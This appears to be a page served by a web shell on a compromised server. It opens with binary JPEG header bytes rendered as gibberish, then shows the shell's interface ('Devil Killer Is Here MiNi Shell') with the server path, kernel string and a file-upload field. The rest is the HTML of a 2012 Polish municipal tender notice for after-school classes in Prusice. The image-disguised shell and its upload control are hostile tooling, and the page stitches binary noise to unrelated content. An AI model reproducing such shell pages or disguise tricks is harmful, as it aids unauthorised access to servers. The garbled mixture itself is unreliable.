JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120920/358160-N-2012.html

<p class="kh_header"><b>Prusice: usługi edukacyjne obejmujące prowadzenie zajęć w ramach projektu 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w roku szkolnym 2012/2013 w szkołach na terenie Gminy Prusice</b><br>
<b>Numer ogłoszenia: 358160 - 2012; data zamieszczenia: 20.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Prusice , Rynek 1, 55-110 Prusice, woj. dolnośląskie, tel. 071 3126224, faks 071 3126229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.prusice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi edukacyjne obejmujące prowadzenie zajęć w ramach projektu 
Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w roku szkolnym 2012/2013 w szkołach na terenie Gminy Prusice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi Przedmiotem zamówienia są usługi edukacyjne obejmujące przeprowadzenie zajęć w ramach projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I-III szkoły podstawowej w roku szkolnym 2012/2013 w szkołach na terenie Gminy Prusice. Projekt realizowany jest w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.
2.	Ilekroć w przedmiocie zamówienia niniejszej SIWZ zostało użyte określenie jednostkowe              1 godzina bez bliższego określenia ilości minut składających się na jednostkę, należy przez to rozumieć jedną godzinę lekcyjną, czyli 45 minut zajęć edukacyjnych.
3.	Usługi będą realizowane w szkołach na terenie Gminy Prusice:
W Zespole Szkół w Prusicach, Szkole Podstawowej im. Henryka Sienkiewicza odbywać będą się następujące zajęcia:
Część I gimnastyka korekcyjna dla dzieci z wadami postawy 
zajęcia odbywały się będą w 1grupie składającej się z 12 uczniów (4 chłopców, 8 dziewczynek) w ilości 30 godzin, 

Część II Chodź pomaluj mój świat zajęcia rozwijające zdolności plastyczne dzieci 
zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (2 chłopców, 6 dziewczynek) w ilości 40 godzin, 

Część III Zajęcia korekcyjno - kompensacyjne dla uczniów ze specjalnymi potrzebami edukacyjnymi
zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (3 chłopców, 2 dziewczynki) w ilości 40 godzin po 60 minut.

Część IV Mediacje rówieśnicze-socjoterapeutyczne
zajęcia odbywały się będą w 1 grupie składającej się z 6 uczniów (4 chłopców, 2 dziewczynki) w ilości 43 godziny po 60 minut.
 
Część V Z komputerem na TY zajęcia rozwijające kompetencje informatyczne dzieci
zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (6 chłopców, 2 dziewczynki) w ilości 30 godzin

Część VI Mały reporter zajęcia dla dzieci rozwijające zainteresowania dziennikarskie 
zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (3 chłopców, 5 dziewczynek) w ilości 30 godzin

W Szkole Podstawowej w Skokowej odbywać się będą następujące zajęcia:
Część VII zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji 
zajęcia odbywały się będą w 1 grupie składającej się z 6 uczniów (3 chłopców, 3 dziewczynki) w ilości 32 godziny,

Część VIII Z komputerem na TY zajęcia rozwijające kompetencje informatyczne dzieci  
zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (3 chłopców, 2 dziewczynki) w ilości 32 godziny,

Część IX Chodź pomaluj mój świat zajęcia rozwijające zdolności plastyczne dzieci 
zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (8 dziewczynek) w ilości 32 godziny,

Część X zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej 
zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (5 dziewczynek) w ilości 34 godziny po 60 minut,

W Szkole Podstawowej w Piotrkowicach odbywać się będą następujące zajęcia:
Część XI Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych polonistycznie zajęcia odbywały się będą w 1 grupie składającej się z 4 uczniów (4 dziewczynki) w ilości 30 godzin,

Część XII Zajęcia matematyczne rozwijające zainteresowania uczniów szczególnie uzdolnionych 
zajęcia odbywały się będą w 1 grupie składającej się z 5 uczniów (3 dziewczynki, 2 chłopców) w ilości 30 godzin,

Część XIII Zajęcia z języka angielskiego rozwijające zainteresowania dzieci szczególnie uzdolnionych 
zajęcia odbywały się będą w 1 grupie składającej się z 7 uczniów (3 dziewczynki, 4 chłopców) w ilości 30 godzin,

Część XIV Zajęcia dla dzieci uzdolnionych artystycznie zajęcia odbywały się będą w 1 grupie składającej się z 8 uczniów (7 dziewczynek, 1 chłopiec) w ilości 30 godzin.

4.	Celem głównym projektu jest wyrównanie szans edukacyjnych poprzez indywidualizację procesu kształcenia dzieci z kl. I-III we wszystkich szkołach podstawowych funkcjonujących w Gminie Prusice, podniesienie poziomu kompetencji kluczowych w zakresie czytania, pisania i podstaw nauk matematycznych, wyrównanie szans edukacyjnych dzieci wykazujących problemy pedagogiczno-psychologiczne poprzez specjalistyczne zajęcia terapeutyczne, poprawę rozwoju mowy i zniwelowanie wad postawy, wzrost kompetencji językowych rozwinięcie zainteresowań i predyspozycji uczniów uzdolnionych w zakresie nauk matematyczno-informatyczno-przyrodniczych, teatralnych, plastycznych, muzycznych, sportowych. Podniesienie jakości poziomu nauczania spowoduje wzrost umiejętności praktycznych uczniów, pokonanie trudności w nauce, podniesienie własnej wartości, nabywanie umiejętności planowania i gospodarowania czasem wolnym, prawidłowe funkcjonowanie w środowisku rówieśniczym, umiejętne korzystanie z gier i programów komputerowych, rozwijanie sprawności matematycznych. 

5.	Wykonawca zobowiązany będzie do świadczenia usług edukacyjnych w szkołach a według harmonogramów ustalanych i zatwierdzonych przez Zamawiającego przy uwzględnieniu planów zajęć uczniów oraz do prowadzenia niezbędnej dokumentacji dot. realizowanych zadań. Wykonawca prowadzący zajęcia pozalekcyjne będzie zobowiązany do opracowania tematyki zajęć, realizacji godzin w ramach projektu, dokumentowania zajęć (na podstawie dzienników zajęć, list obecności), prowadzenia obserwacji i pomiarów pedagogicznych, sporządzania dokumentacji, dokonywania oceny efektywności pomocy, sprawozdań na podstawie analiz, ankiet, diagnoz i innych narzędzi wykorzystywanych do pomiaru jakości i mierzenia rezultatów oraz do pomocy i współpracy z osobami nadzorującymi projekt, jak również do informowania uczestników zajęć o współfinansowaniu zajęć ze środków Unii Europejskiej w ramach Europejskeigo Funduszu Społecznego wraz z zebraniem dokumentów- oświadczeń rodziców o wyrażeniu zgody na udział dzieci w projekcie, zgody na przetwarzanie danych osobowych dla potrzeb Podstystemu Europejskiego Funduszu Społecznego. Działania dostosowywane będą do indywidualnych potrzeb uczniów na podstawie udostępnionych przez dyrektorów szkół diagnoz, analiz, wywiadów, rozpoznanych potrzeb i możliwości.
6.	Wykonawca wykona zamówienie wyłącznie osobami wskazanymi w ofercie w załączniku nr 4..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 81.00.00.00-5, 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych wymagań.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych wymagań.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych wymagań.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują w następujących częściach, co najmniej po jednej osobie posiadającą kwalifikacje zgodne z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz.U. z 2009 nr 50, poz. 400) oraz poniższym zestawieniem:

Część I gimnastyka korekcyjna dla dzieci z wadami postawy - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej i z kwalifikacjami do prowadzenia zajęć gimnastyki korekcyjnej.

Część II- Chodź pomaluj mój świat zajęcia rozwijające zdolności plastyczne dzieci - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej,

Część III Zajęcia korekcyjno - kompensacyjne dla uczniów ze specjalnymi potrzebami edukacyjnymi - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z  kwalifikacjami - terapia pedagogiczna, 
Część IV Mediacje rówieśnicze-socjoterapeutyczne zajęcia - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego co najmniej nauczyciel kontraktowy z  kwalifikacjami z zakresu mediacji, nauczyciel psycholog,

Część V Z komputerem na TY zajęcia rozwijające kompetencje informatyczne dzieci - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej  oraz z kwalifikacjami do prowadzenia zajęc informatycznych.

Część VI Mały reporter zajęcia dla dzieci rozwijające zainteresowania dziennikarskie - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej oraz z uprawnieniami z zakresu dziennikarstwa.

Część VII zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel mianowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej,

Część VIII Z komputerem na TY zajęcia rozwijające kompetencje informatyczne dzieci -wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel mianowany z  kwalifikacjami do nauczania informatyki,

Część IX Chodź pomaluj mój świat zajęcia rozwijające zdolności plastyczne dzieci - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego co najmniej nauczyciel mianowany,

Część X zajęcia socjoterapeutyczne dla dzieci z zaburzeniami komunikacji społecznej - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego, co najmniej nauczyciel kontraktowy z kwalifikacjami do prowadzenia zajęć z socjoterapii.

Część XI Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych polonistycznie- wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z  kwalifikacjami do nauczania w klasach I-III szkoły podstawowej,

Część XII Zajęcia matematyczne rozwijające zainteresowania uczniów szczególnie uzdolnionych - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego nauczyciel dyplomowany z  kwalifikacjami do nauczania w klasach I-III szkoły podstawowej,

Część XIII Zajęcia z języka angielskiego rozwijające zainteresowania dzieci szczególnie uzdolnionych - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego co najmniej nauczyciel mianowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej oraz uprawnieniami do nauki języka angielskiego,

Część XIV Zajęcia dla dzieci uzdolnionych artystycznie - wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym, stopień awansu zawodowego, co najmniej nauczyciel mianowany z kwalifikacjami do nauczania w klasach I-III szkoły podstawowej.

Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu osób oraz oświadczenia; na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie określa się minimalnych wymagań.
Ocena spełniania warunku będzie dokonana na podstawie złożonego oświadczenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, 
w występującym zakresie i przy spełnieniu następujących warunków:
1)	zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć w dacie dokonywania wyboru najkorzystniejszej oferty, w szczególności w przypadku zmian na rynku usług objętych niniejszym postępowaniem, wystąpienia istotnych trudności w pozyskaniu przez Wykonawcę lub Zamawiającego materiałów niezbędnych do wykonania zamówienia, gdy zmiany są korzystne dla Zamawiającego, 
2)	zmiany wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki podatku VAT, 
3)	wystąpią konieczność wykonania prac dodatkowych lub zamiennych mających wpływ na koszt lub termin realizacji udzielonego zamówienia,
4)	 w sytuacjach, których, nie można było przewidzieć w chwili zawarcia umowy, a nie powstałych z winy Zamawiającego lub Wykonawcy, Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu robót wraz z odpowiednim zmniejszeniem wynagrodzenia umownego;
5)	gdy zmiany będą korzystne dla Zamawiającego i nie będą:
a)	wprowadzane warunki, które gdyby zostały ujęte w ramach procedury przetargowej udzielenia zamówienia umożliwiłyby dopuszczenie innych ofert niż ta, która została pierwotnie dopuszczona;
b)	modyfikowały równowagi ekonomicznej umowy na korzyść Wykonawcy w sposób, który nie był przewidziany w postanowieniach pierwotnego zamówienia.
lub będą polegały w szczególności na:
a)	skróceniu terminu wykonania umowy, przyśpieszenie ukończenia robót, dostaw lub usług,
b)	zmianie ilości robót, usług lub dostaw, ale tylko mieszczących się w opisie przedmiotu zamówienia,
6)	Zmiana terminu realizacji z powodu okoliczności leżących po stronie Zamawiającego, w szczególności wstrzymania realizacji przedmiotu zamówienia przez Zamawiającego,
7)	zmiana terminu realizacji umowy prac w związku z wystąpieniem potrzeby udzielenia zamówienia dodatkowego lub uzupełniającego, 
8)	gdy niedotrzymanie pierwotnego terminu realizacji umowy, stanowi konsekwencję zdarzeń niezależnych od Wykonawcy, nie stanowiących jego i podwykonawców problemów organizacyjnych - Zamawiający dopuszcza możliwość przedłużenia terminu realizacji umowy o czas niezbędny do usunięcia konsekwencji zdarzeń;
9)	zmiana korzystna dla Zamawiającego naruszająca równowagę ekonomiczną umowy oraz wpływające na zmianę przedmiotu zamówienia, w przypadku zmiany okoliczności faktycznych sprawiających, że dalsza realizacja zamówienia publicznego w obecnym kształcie nie leżałaby w interesie publicznym,
10)	zmiany sposobu spełnienia świadczenia z powodu nadzwyczajnej zmiany stosunków w wyniku, których spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, czego strony nie przewidywały przy zawarciu umowy o zamówienie, 
11)	zmiany sposobu spełnienia świadczenia w sytuacji, gdy już po wyborze oferty zmieniły się okoliczności w sposób uniemożliwiający zawarcie umowy na warunkach wynikających z oferty,
12)	zmiana danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby biura Wykonawcy,
13)	zmiany danych osobowych - zmiany osób (personelu),</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.prusice.pl zakładka zamówienia publiczne/ rok 2012<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Prusice
ul. Rynek 1 
55-110 Prusice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2012 godzina 11:00, miejsce: Urząd Miasta i Gminy Prusice
ul. Rynek 1 
55-110 Prusice
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską ze środków Programu Operacyjnego Kapitał Ludzki w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> gimnastyka korekcyjna dla dzieci z wadami postawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zajęcia odbywały się będą w 1grupie składającej się z 12 uczniów (4 chłopców, 8 dziewczynek) w ilości 30 godzin,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5, 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Chodź pomaluj mój świat zajęcia rozwijające zdolności plastyczne dzieci.</p>
